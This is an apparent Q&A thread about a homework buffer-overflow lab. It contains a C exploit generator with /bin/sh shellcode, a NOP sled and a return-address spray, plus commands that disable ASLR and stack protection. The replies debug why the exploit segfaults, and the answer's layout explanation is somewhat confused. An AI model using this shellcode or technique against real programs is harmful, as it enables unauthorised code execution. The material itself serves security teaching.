# Stack smashing keep getting segmentation fault

Tags: buffer-overflow, c, shellcode

I have a homework assignment to do stack smashing,

The exploit code creates a badfile in which the vulnerable file reads and buffer over flow occurs.

I have already did the 2 commands below to ensure I can complete the attack

sudo sysctl -w kernel.randomize_va_space=0

gcc -o stack -fno-stack-protector stack.c   (where stack.c is the vulnerable code)

I disabled the non executable stack as well

For the exploit, I have the shellcode, so what I did is to get the stack pointer hence the return address and push them into a buffer in the exploit code. The buffer is filled up with NOPs to the half of the buffer, then the shell code. The rest of the buffer is filled up with the return addresses.

so my code is as below

```
  /* exploit.c
*/
/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[]=
"\x31\xc0"    /* xorl %eax,%eax*/
"\x50"          /* pushl %eax*/
"\x68""//sh"    /* pushl $0x68732f2f*/
"\x68""/bin"    /* pushl $0x6e69622f*/
"\x89\xe3"    /* movl %esp,%ebx*/
"\x50"        /* pushl %eax*/
"\x53"        /* pushl %ebx*/
"\x89\xe1"    /* movl %esp,%ecx*/
"\x99"        /* cdql*/
"\xb0\x0b"    /* movb $0x0b,%al*/
"\xcd\x80"    /* int $0x80*/
;

void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
long *addr_ptr,retaddr;
char *ptr;
char *aptr;

unsigned long get_sp(void)
{    
    __asm__("movl %esp,%eax");
}

/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);

/* You need to fill the buffer with appropriate contents here */

retaddr = get_sp() - atoi(argv[1]);
printf("Stack Pointer: 0x%lx\n", get_sp());
printf("Using address: 0x%lx\n", retaddr);

//int i;
memcpy(buffer+(sizeof(buffer)-1)/2,shellcode,strlen(shellcode));

int i;
for(i=0;i<(sizeof(buffer)-1)/2;i+=4)    
    *(long *)&buffer[i] = retaddr;

/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
 }
```

So for the offset I will input random numbers to try the offset, to get to the correct address. However I keep getting segmentation faults after iterating a lot of times. I have no idea what is going on. Anyone can help?

Comment: Have you tried running this in a debugger to see at what stage in the code the segmentation fault occurs?

Comment: yea, i will print out the address of the stack pointer and the address that I am trying from the calculation of the offset from the stack pointer, the address that I am trying is the same as the address that it has segmentation fault. Not sure if i am explaining it correctly here, because the return address is unknown, i will run a script at the terminal to loop through different values of offset and attempt a buffer overflow.If I am running in the debugger, what else should I be looking for?

Answer (score 3):

Your memcpy utilization needs a review - please follow:

Your original post:
`memcpy(buffer+(sizeof(buffer)-1)/2,shellcode,strlen(shellcode));`

For starters, you use `buffer` without referring to it as a pointer - &buffer
actually, there are some compiler that can handle it, so it's not necessarily what stops you from exploiting the stack.

Now, you try to measure the buffer, decreasing by one and then cut it in half - it gives you 258 offset.
Your NOP sled now looks something like this:

> NOP, NOP, NOP X 517 --- 258 unspecified bytes -- shellcode

that doesn't make so much sense - why to leave those unspecified bytes inside your NOP sled?

Last, you make an iteration over i that cover half of your NOP sled with your guess of the return address.

Can you see your errors now?